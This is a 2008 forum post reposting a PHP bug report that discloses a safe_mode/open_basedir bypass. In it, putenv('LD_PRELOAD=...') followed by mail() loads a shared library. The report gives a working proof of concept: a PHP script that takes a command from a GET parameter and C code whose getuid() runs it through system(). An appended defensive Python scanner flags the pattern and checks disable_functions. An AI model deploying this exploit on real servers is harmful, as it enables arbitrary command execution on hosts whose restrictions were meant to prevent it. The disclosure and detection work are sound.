safe_mode and open_basedir bypass via mail() and putenv()

Posted: Wed Dec 10, 2008 5:08 pm

waraxe
Site admin

Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

http://aspn.activestate.com/ASPN/Mail/Message/php-dev/3681551
Code:
From: gat3way at gat3way dot eu
Operating system: Linux
PHP version: 5.2.6
PHP Bug Type: Safe Mode/open_basedir
Bug description: putenv()+mail() allows for open_basedir bypass and "disabled" functionality
Description:
------------
safe_mode is safe, but the mail() function should check environment
variables IMO.
e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail() calls
/usr/bin/mail if your library exports function like getuid() you can bypass
open_basedir restrictions and restrictions on program execution, etc.
If you need some more info, please contact me at:
gat3way@[...].eu
Milen Rangelov
Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a=fopen("/var/www/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
mail("a","a","a","a");
$a=fopen("/var/www/.comm1","r");
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a); ?>
A simple library:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;
unsetenv("LD_PRELOAD");
a=fopen("/var/www/.comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a); remove("/var/www/.comm");
rename("/var/www/a.so","/var/www/b.so");
buf=strcat(buf," > /var/www/.comm1");
system(buf);
rename("/var/www/b.so","/var/www/a.so");
free(buf);return 0;
}
Expected result:
----------------
execute arbitrary commands even though we have:
disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www
Actual result:
--------------
The test was successful.
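Added example, not part of waraxe's post or of Milen Rangelov's bug report: a small Python static check, written from the defender's side, that looks for the pattern the report describes (a putenv() that sets a dynamic-loader variable in the same script as a call such as mail() that starts an external program) and that checks whether a php.ini disable_functions line covers a given function. The names scan_php_source, assess and disable_functions_covers, the sample PHP text and its /tmp/example.so path are constructed for this example; the php.ini lines are the two quoted in the report.

```python
import re

# Added example (not from the bug report or the forum post): a static check for
# the putenv()+mail() pattern described above, written from a defender's view.

# Environment variables read by the dynamic loader (glibc ld.so, macOS dyld).
# Any program PHP spawns, including the sendmail binary behind mail(), inherits
# the environment, so a putenv() that sets one of these is the thing to flag.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "DYLD_INSERT_LIBRARIES")

# PHP built-ins that start an external program. mail() belongs here because it
# runs the configured sendmail binary, which is exactly what the report relies on.
SPAWNING_FUNCS = ("mail", "system", "exec", "passthru", "shell_exec", "popen", "proc_open")

# putenv("NAME=...") or putenv('NAME=...'); group 2 is NAME.
PUTENV_LITERAL_RE = re.compile(
    r"putenv\s*\(\s*([\"'])\s*([A-Za-z_][A-Za-z0-9_]*)\s*=", re.IGNORECASE)
PUTENV_ANY_RE = re.compile(r"\bputenv\s*\(", re.IGNORECASE)
SPAWN_RE = re.compile(r"\b(" + "|".join(SPAWNING_FUNCS) + r")\s*\(", re.IGNORECASE)


def scan_php_source(source):
    """Return (line_no, kind, detail) findings for one PHP source text.

    kind is 'loader_env' for putenv() on a loader variable, 'putenv_dynamic'
    for a putenv() whose argument is not a string literal (cannot be judged
    statically), and 'spawn' for a call that starts a child process.
    """
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        lit = PUTENV_LITERAL_RE.search(line)
        if lit:
            name = lit.group(2).upper()
            if name in LOADER_VARS:
                findings.append((line_no, "loader_env", name))
        elif PUTENV_ANY_RE.search(line):
            findings.append((line_no, "putenv_dynamic", ""))
        for call in SPAWN_RE.finditer(line):
            findings.append((line_no, "spawn", call.group(1).lower()))
    return findings


def assess(findings):
    """Collapse findings to 'high', 'medium' or 'none'.

    high   : a loader variable is set and a child process is spawned, the
             combination the report abuses.
    medium : a loader variable is set, or putenv() gets a non-literal argument,
             without a visible spawn in the same file.
    none   : nothing of interest (a spawn on its own is ordinary PHP).
    """
    kinds = {f[1] for f in findings}
    if "loader_env" in kinds and "spawn" in kinds:
        return "high"
    if "loader_env" in kinds or "putenv_dynamic" in kinds:
        return "medium"
    return "none"


def disable_functions_covers(ini_text, func_name):
    """True if the php.ini text's disable_functions line lists func_name."""
    for line in ini_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "disable_functions":
            names = {n.strip().lower() for n in value.split(",") if n.strip()}
            return func_name.lower() in names
    return False


# Constructed sample input that mirrors the shape of the reported script
# (the library path is a placeholder, not the report's).
SAMPLE_PHP = """<?php
putenv("LD_PRELOAD=/tmp/example.so");
mail("a", "a", "a", "a");
?>"""

# The php.ini settings quoted in the report.
REPORTED_INI = """disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www
"""

if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE_PHP):
        print(finding)
    print("risk:", assess(scan_php_source(SAMPLE_PHP)))
    print("putenv disabled:", disable_functions_covers(REPORTED_INI, "putenv"))
```

Run against the report's own settings, the check shows that the quoted disable_functions list does not include putenv, which is the gap the report relies on; adding putenv to disable_functions closes it independently of safe_mode, which PHP removed in 5.4. The scan is line-based and will miss a putenv() whose string is built elsewhere or a call split across lines, so treat a 'putenv_dynamic' finding as something to read by hand rather than as a clean result.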